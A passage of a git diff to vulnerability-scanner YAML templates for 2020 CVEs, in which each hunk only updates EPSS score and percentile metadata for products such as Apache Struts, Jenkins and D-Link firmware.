2dd8dba59e..8112144cdc 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 - epss-score: 0.97432 - epss-percentile: 0.99903 + epss-score: 0.97429 + epss-percentile: 0.99915 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c4416221a8..995c9a4c5a 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 - epss-score: 0.03274 - epss-percentile: 0.90012 + epss-score: 0.24573 + epss-percentile: 0.96076 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 74ac02cae8..e4c1220750 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17530 cwe-id: CWE-917 - epss-score: 0.97161 - epss-percentile: 0.99704 + epss-score: 0.96908 + epss-percentile: 0.99612 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 6a29e60c9e..cd94b9517d 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00138 - epss-percentile: 0.48623 + epss-percentile: 0.48992 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 1da9daeaed..03a89eebb5 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19282 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47974 + epss-percentile: 0.48338 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index b4bc6e8dc8..9a99280a6e 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47974 + epss-percentile: 0.48338 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 5caf4140db..c04477a204 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44609 + epss-percentile: 0.44995 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index fe67f8f9bf..e9502183cc 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-19360 cwe-id: CWE-22 - epss-score: 0.08829 - epss-percentile: 0.93744 + epss-score: 0.05605 + epss-percentile: 0.92404 cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 09fcc03314..1953177b6b 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 - epss-score: 0.9737 - epss-percentile: 0.99851 + epss-score: 0.97315 + epss-percentile: 0.99831 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 1ea948259b..e67eb20c5c 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 611ebe8655..275c51e87e 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-1956 cwe-id: CWE-78 - epss-score: 0.97423 - epss-percentile: 0.99894 + epss-score: 0.97372 + epss-percentile: 0.99869 cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index a6d166a2d1..a4ca315422 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-19625 - epss-score: 0.88684 - epss-percentile: 0.98276 + epss-score: 0.8354 + epss-percentile: 0.98052 cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 806b6b7faf..a382627b5e 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37386 + epss-percentile: 0.37749 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 8af090779c..f62a1c57dd 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-20300 cwe-id: CWE-89 - epss-score: 0.218 - epss-percentile: 0.95816 + epss-score: 0.16832 + epss-percentile: 0.95437 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 4dd46fb321..a04d127753 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-2036 cwe-id: CWE-79 epss-score: 0.00951 - epss-percentile: 0.81231 + epss-percentile: 0.81442 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index ca23cd55e7..97fad3f5bd 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-2096 cwe-id: CWE-79 - epss-score: 0.96767 - epss-percentile: 0.9952 + epss-score: 0.96822 + epss-percentile: 0.99565 cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index c1cfbcad26..273094c992 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-20982 cwe-id: CWE-79 epss-score: 0.01894 - epss-percentile: 0.87011 + epss-percentile: 0.87139 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index f9d1805d4b..bae95c3555 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37386 + epss-percentile: 0.37749 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index 31aa6b5250..e7bc3efc73 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - epss-score: 0.07545 - epss-percentile: 0.93277 + epss-score: 0.04989 + epss-percentile: 0.91939 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 8a063330c4..4888c59413 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - epss-score: 0.00534 - epss-percentile: 0.74191 + epss-score: 0.01531 + epss-percentile: 0.85596 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index bdfaa3731c..250a5ae190 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21224 cwe-id: CWE-88 - epss-score: 0.03105 - epss-percentile: 0.89779 + epss-score: 0.03633 + epss-percentile: 0.90591 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 65a34b9dac..803fedddcc 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - epss-percentile: 0.54659 + epss-percentile: 0.55093 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 7eb9054678..ac6a564266 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-22208 cwe-id: CWE-89 epss-score: 0.10555 - epss-percentile: 0.94277 + epss-percentile: 0.9437 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 09c908ab34..3025c5bd42 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-22209 cwe-id: CWE-89 epss-score: 0.10555 - epss-percentile: 0.94277 + epss-percentile: 0.9437 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 217e04baed..29fbf5ac5d 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-22210 cwe-id: CWE-89 epss-score: 0.10555 - epss-percentile: 0.94277 + epss-percentile: 0.9437 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index efff98cc7a..c41220d0f6 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-22211 cwe-id: CWE-89 epss-score: 0.10555 - epss-percentile: 0.94277 + epss-percentile: 0.9437 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index a7f2e41d12..59a4abd3a8 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-22840 cwe-id: CWE-601 - epss-score: 0.01174 - epss-percentile: 0.83233 + epss-score: 0.01433 + epss-percentile: 0.85073 cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index 11ef657d5d..33100b4b8e 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00228 - epss-percentile: 0.60346 + epss-percentile: 0.60743 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 4c8e227cbc..fd45c08d31 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45089 + epss-percentile: 0.45476 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index ae373f2b32..f2c4314aff 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-23575 cwe-id: CWE-22 epss-score: 0.01879 - epss-percentile: 0.86948 + epss-percentile: 0.8708 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index bde9d3a077..e456a5e4fc 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37386 + epss-percentile: 0.37749 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index e2f48aa54e..4e87836ee1 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - epss-score: 0.59376 - epss-percentile: 0.9731 + epss-score: 0.60915 + epss-percentile: 0.97403 cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 27f69539a8..480ca46d8f 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24148 cwe-id: CWE-918 epss-score: 0.06584 - epss-percentile: 0.92859 + epss-percentile: 0.92959 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 995f9d2854..1241842635 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - epss-score: 0.97466 - epss-percentile: 0.99936 + epss-score: 0.97443 + epss-percentile: 0.9993 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 6e44d5d758..69f9c6fc44 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.00976 - epss-percentile: 0.81474 + epss-percentile: 0.81672 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index d0cd5918f6..60322e0922 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - epss-score: 0.01899 - epss-percentile: 0.87035 + epss-score: 0.01622 + epss-percentile: 0.86038 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index b37e74a5aa..0dd4da2400 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - epss-score: 0.49786 - epss-percentile: 0.9707 + epss-score: 0.47848 + epss-percentile: 0.97074 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index cc63c5916d..f52d4ad651 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-24550 cwe-id: CWE-601 epss-score: 0.00157 - epss-percentile: 0.5154 + epss-percentile: 0.51922 cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 5fe89d1bd5..97a049bf50 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24571 cwe-id: CWE-22 - epss-score: 0.02885 - epss-percentile: 0.89445 + epss-score: 0.03143 + epss-percentile: 0.89973 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 7e9385f988..27be3085f0 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.00455 - epss-percentile: 0.72083 + epss-score: 0.00734 + epss-percentile: 0.78649 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 716d2d5624..da535142d1 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24589 cwe-id: CWE-611 - epss-score: 0.57189 - epss-percentile: 0.97253 + epss-score: 0.62377 + epss-percentile: 0.97442 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 478c2ec415..4803c74c50 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 - epss-score: 0.00179 - epss-percentile: 0.54405 + epss-score: 0.00191 + epss-percentile: 0.56324 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 3be41411bd..31648e7779 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 - epss-score: 0.00246 - epss-percentile: 0.61852 + epss-score: 0.00262 + epss-percentile: 0.63579 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 0a552be458..23dd3c4a4a 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 - epss-score: 0.00187 - epss-percentile: 0.55307 + epss-score: 0.00183 + epss-percentile: 0.55341 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 5bad9c5f0a..0054504fac 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24949 cwe-id: CWE-77 - epss-score: 0.96607 - epss-percentile: 0.99452 + epss-score: 0.96368 + epss-percentile: 0.99391 cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 9cc5093afb..75ab1f168f 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.96829 - epss-percentile: 0.99549 + epss-percentile: 0.99568 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index e7fed98189..8bd2abe297 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - epss-score: 0.97341 - epss-percentile: 0.99825 + epss-score: 0.97352 + epss-percentile: 0.99856 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 8323f0fe08..041fe487c2 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25223 cwe-id: CWE-78 - epss-score: 0.97519 - epss-percentile: 0.99975 + epss-score: 0.97466 + epss-percentile: 0.99948 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 28fd68342d..200ce23900 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50958 + epss-score: 0.00176 + epss-percentile: 0.54466 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 7d40250e23..052ed09e75 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 - epss-score: 0.97451 - epss-percentile: 0.99921 + epss-score: 0.97435 + epss-percentile: 0.99923 cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 5ad3b16b17..6d8e66cc6e 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - epss-score: 0.97468 - epss-percentile: 0.99939 + epss-score: 0.97463 + epss-percentile: 0.99944 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index 56dc9b6062..f86d2cb120 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-25540 cwe-id: CWE-22 epss-score: 0.96418 - epss-percentile: 0.99372 + epss-percentile: 0.99408 cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index dc4ee3cc0b..2bed5f5958 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-25780 cwe-id: CWE-22 epss-score: 0.01865 - epss-percentile: 0.869 + epss-percentile: 0.87012 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 54a3bd603f..f0cf0216dd 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-25864 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.62621 + epss-percentile: 0.6303 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 6d435503d9..fcfa5ba1d6 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-26153 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46567 + epss-percentile: 0.46903 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26214.yaml 